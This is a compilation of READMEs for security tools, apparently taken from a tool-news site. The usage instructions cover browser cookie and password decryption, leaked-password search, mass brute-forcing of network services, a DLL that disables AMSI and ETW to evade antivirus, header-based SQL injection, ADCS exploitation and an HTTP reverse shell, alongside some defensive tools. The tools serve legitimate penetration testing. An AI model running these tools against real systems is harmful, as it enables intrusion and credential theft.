--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make is installed on the linux prior to compiling.
make
to compile exe on windows
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
bash pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
bash chmod +x clone.sh ./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
โโโ json
โโโ AWS
โย ย โโโ 2024-03-04 01:01 AM
โย ย โโโ cloudtrail-logs-00000000-ffffff--
โย ย โโโ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โย ย โโโ GetFileDownloadUrls.*secrets_.json
โโโ AZURE
โโโ 2024-03-04 01:01 AM
โโโ logs
โโโ cloudgrappler
โโโ okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.
~ Hilali Abdel
USAGE
python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]
[Add new Device]
python3 smartthings.py -a 192.168.1.1
python3 smarthings.py -s --type TPLINK
python3 smartthings.py -s --firmware TP-Link Archer C7v2
Search for CVE and Poc [ firmware and device type]
Scan device for open upnp ports
python3 smartthings.py -s --scan upnp --id
get data from mqtt 'subscribe'
python3 smartthings.py -s --scan mqtt --id
DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.
DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
Install Android disassembly tools
Apktool ,
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
Install from Git in a Python virtual environment (python3 -m venv
, or pyenv virtual environments etc).
$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis
Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis
).
conf/general.conf
. In particular make sure to change /home/axelle
with your appropriate directories.[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
python3 ./droidlysis3.py --help
The configuration file is ./conf/general.conf
(you can switch to another file with the --config
option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf
, ./conf/wide.conf
, ./conf/arm.conf
, ./conf/kit.conf
) and the name of the database file (only used if you specify --enable-sql
)
Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.
DroidLysis uses Python 3. To launch it and get options:
droidlysis --help
For example, test it on Signal's APK:
droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf
DroidLysis outputs:
--output /tmp
, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290
.droidlysis.db
) containing properties it noticed.Get usage with droidlysis --help
The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.
When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein
. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput
. If you want to store all statistics in a SQL database, use --enable-sql
(see here)
DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon
.
DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception
. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).
--output DIR
)This directory contains (when applicable):
AndroidManifest.xml
res
lib
, assets assets
smali
(and others)META-INF
./unzipped
classes.dex
(and others), and converted to jar: classes-dex2jar.jar
, and unjarred in ./unjarred
The following files are generated by DroidLysis:
autoanalysis.md
: lists each pattern DroidLysis detected and where.report.md
: same as what was printed on the consoleIf you do not need the sample output directory to be generated, use the option --clearoutput
.
--import-exodus
)$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf
Trackers from Exodus which are not present in your initial kit.conf
are appended to ~/.cache/droidlysis/kit.conf
. Diff the 2 files and check what trackers you wish to add.
If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql
. This will automatically dump all results in a database named droidlysis.db
, in a table named samples
. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.
For example, to retrieve all filename, SHA256 sum and smali properties of the database:
sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
What DroidLysis detects can be configured and extended in the files of the ./conf
directory.
A pattern consist of:
send_sms
. This is to name the property. Must be unique across the .conf
file.;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
. In the smali.conf
file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf
. Add option --import_exodus
to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf
. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf
.
Afterwards, you may want to sort your kit.conf
file:
import configparser
import collections
import os
config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)
DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.
Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.
First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:
git clone https://github.com/luijait/DarkGPT.git cd DarkGPT
You will need to set up some environment variables for the script to work correctly. Copy the .env.example
file to a new file named .env
:
DEHASHED_API_KEY="your_dehashed_api_key_here"
This project requires certain Python packages to run. Install them by running the following command:
pip install -r requirements.txt 4. Then Run the project: python3 main.py
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/LeakSearch
_ _ ____ _
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|
------------------- by @JoelGMSec -------------------
usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]
options:
-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)
https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.
Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.
git clone https://github.com/josh0xA/Pantheon.git
cd Pantheon
pip3 install -r requirements.txt
python3 pantheon.py
chmod +x distros/ubuntu_install.sh
./distros/ubuntu_install.sh
chmod +x distros/debian-kali_install.sh
./distros/debian-kali_install.sh
(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)
(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).
Adjust the map as you please to see the markers.
The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html
MIT License
Copyright (c) Josh Schiavone
NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
NetworkSherlock requires Python 3.6 or later.
git clone https://github.com/HalilDeniz/NetworkSherlock.git
pip install -r requirements.txt
Update the networksherlock.cfg
file with your Shodan API key:
[SHODAN]
api_key = YOUR_SHODAN_API_KEY
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target
NetworkSherlock: Port Scan Tool
positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)
options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information
target
: The target IP address(es), IP range, or CIDR block to scan.-p
, --ports
: Ports to scan (e.g., 1-1000, 22,80,443).-t
, --threads
: Number of threads to use.-P
, --protocol
: Protocol to use for scanning (tcp or udp).-V
, --version-info
: Obtain version information during banner grabbing.-s
, --save-results
: Save results to the specified file.-c
, --ping-check
: Perform a ping check before scanning.--use-shodan
: Enable Shodan integration.Scan a single IP address on default ports:
python networksherlock.py 192.168.1.1
Scan an IP address with a custom range of ports:
python networksherlock.py 192.168.1.1 -p 1-1024
Scan multiple IP addresses on specific ports:
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443
Scan an entire subnet using CIDR notation:
python networksherlock.py 192.168.1.0/24 -p 80
Perform a scan using multiple threads for faster execution:
python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20
Scan using a specific protocol (TCP or UDP):
python networksherlock.py 192.168.1.1 -p 53 -P udp
python networksherlock.py 192.168.1.1 --use-shodan
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan
Perform a detailed scan with banner grabbing and save results to a file:
python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
Scan an IP range after performing a ping check:
python networksherlock.py 10.0.0.1-10.0.0.255 -c
$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock ro ot@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------
$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21- 1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
Contributions are welcome! To contribute to NetworkSherlock, follow these steps:
py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.
Via pip
pip install pyamsi
Clone repository
git clone https://github.com/Tomiwa-Ot/py-amsi.git
cd py-amsi/
python setup.py install
from pyamsi import Amsi
# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default
# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default
# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level | Meaning |
---|---|
0 | AMSI_RESULT_CLEAN (File is clean) |
1 | AMSI_RESULT_NOT_DETECTED (No threat detected) |
16384 | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator) |
20479 | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator) |
32768 | AMSI_RESULT_DETECTED (File is considered malware) |
https://tomiwa-ot.github.io/py-amsi/index.html
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
masscan
(faster than nmap) to find alive hosts with common ports from network segment.masscan
result.hydra
commands to automatically bruteforce supported network services on devices.Kali linux
or any preferred linux distributionPython 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private ip range :
10.0.0.0/8
,192.168.0.0/16
,172.16.0.0/12
Save masscan results under ./result/masscan/
, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
โโโ(rootใฟroot)-[~/mass-bruter]
โโ# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcomed!
LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
LightsOut is designed to work on Linux systems with python3
and mingw-w64
installed. No other dependencies are required.
Features currently include:
_______________________
| |
| AMSI + ETW |
| |
| LIGHTS OUT |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
`-----------------------'
usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]
Generate an obfuscated DLL that will disable AMSI & ETW
options:
-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox < ;option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to
Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch
Intended Use/Opsec Considerations
This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.
Usage Examples
You can transfer the output DLL to your target system and load it into powershell various ways. For example, it can be done via P/Invoke with LoadLibrary:
Or even easier, copy powershell to an arbitrary location and side load the DLL!
Greetz/Credit/Further Reference:
HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.ย
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
Install HBSQLI with following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command
You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.
You can use the provided headers file or even some more custom header in that file itself according to your need.
Designed to validate potential usernames by querying OneDrive and/or Microsoft Teams, which are passive methods.
Additionally, it can output/create a list of legacy Skype users identified through Microsoft Teams enumeration.
Finally, it also creates a nice clean list for future usage, all conducted from a single tool.
$ python3 .\KnockKnock.py -h
_ __ _ _ __ _
| |/ /_ __ ___ ___| | _| |/ /_ __ ___ ___| | __
| ' /| '_ \ / _ \ / __| |/ / ' /| '_ \ / _ \ / __| |/ /
| . \| | | | (_) | (__| <| . \| | | | (_) | (__| <
|_|\_\_| |_|\___/ \___|_|\_\_|\_\_| |_|\___/ \___|_|\_\
v0.9 Author: @waffl3ss
usage: KnockKnock.py [-h] [-teams] [-onedrive] [-l] -i INPUTLIST [-o OUTPUTFILE] -d TARGETDOMAIN [-t TEAMSTOKEN] [-threads MAXTHREADS] [-v]
options:
-h, --help show this help message and exit
-teams Run the Teams User Enumeration Module
-onedrive Run the One Drive Enumeration Module
-l Write legacy skype users to a seperate file
-i INPUTLIST Input file with newline-seperated users to check
-o OUTPUTFILE Write output to file
-d TARGETDOMAIN Domain to target
-t TEAMSTOKEN Teams Token (file containing token or a string)
-threads MAXTHREADS Number of threads to use in the Teams User Enumeration (default = 10)
-v Show verbose errors
./KnockKnock.py -teams -i UsersList.txt -d Example.com -o OutFile.txt -t BearerToken.txt
./KnockKnock.py -onedrive -i UsersList.txt -d Example.com -o OutFile.txt
./KnockKnock.py -onedrive -teams -i UsersList.txt -d Example.com -t BearerToken.txt -l
To get your bearer token, you will need a Cookie Manager plugin on your browser and login to your own Microsoft Teams through the browser.
Next, view the cookies related to the current webpage (teams.microsoft.com).
The cookie you are looking for is for the domain .teams.microsoft.com and is titled "authtoken".
You can copy the whole token as the script will split out the required part for you.
@nyxgeek - onedrive_user_enum
@immunIT - TeamsUserEnum
ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that the ADCSKiller is currently in its first drafts and will undergo further refinements and additions in future updates for sure.
Since this tool relies on Certipy and Coercer, both tools have to be installed first.
git clone https://github.com/ly4k/Certipy && cd Certipy && python3 setup.py install
git clone https://github.com/p0dalirius/Coercer && cd Coercer && pip install -r requirements.txt && python3 setup.py install
git clone https://github.com/grimlockx/ADCSKiller/ && cd ADCSKiller && pip install -r requirements.txt
Usage: adcskiller.py [-h] -d DOMAIN -u USERNAME -p PASSWORD -t TARGET -l LEVEL -L LHOST
Options:
-h, --help Show this help message and exit.
-d DOMAIN, --domain DOMAIN
Target domain name. Use FQDN
-u USERNAME, --username USERNAME
Username.
-p PASSWORD, --password PASSWORD
Password.
-dc-ip TARGET, --target TARGET
IP Address of the domain controller.
-L LHOST, --lhost LHOST
FQDN of the listener machine - An ADIDNS is probably required
HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.
This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection and movement between directories.
It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:
git clone https://github.com/JoelGMSec/HTTP-Shell
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
How PurpleOps is different:
# Clone this repository
$ git clone https://github.com/CyberCX-STA/PurpleOps
# Go into the repository
$ cd PurpleOps
# Alter PurpleOps settings (if you want to customize anything but should work out the box)
$ nano .env
# Run the app with docker
$ sudo docker compose up
# PurpleOps should now by available on http://localhost:5000, it is recommended to add a reverse proxy such as nginx or Apache in front of it if you want to expose this to the outside world.
# Alternatively
$ sudo docker run --name mongodb -d -p 27017:27017 mongo
$ pip3 install -r requirements.txt
$ python3 seeder.py
$ python3 purpleops.py
We would love to hear back from you, if something is broken or have and idea to make it better add a ticket or ping us pops@purpleops.app | @_w_m__
DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.ย
git clone https://github.com/HalilDeniz/DNSWatch.git
pip install -r requirements.txt
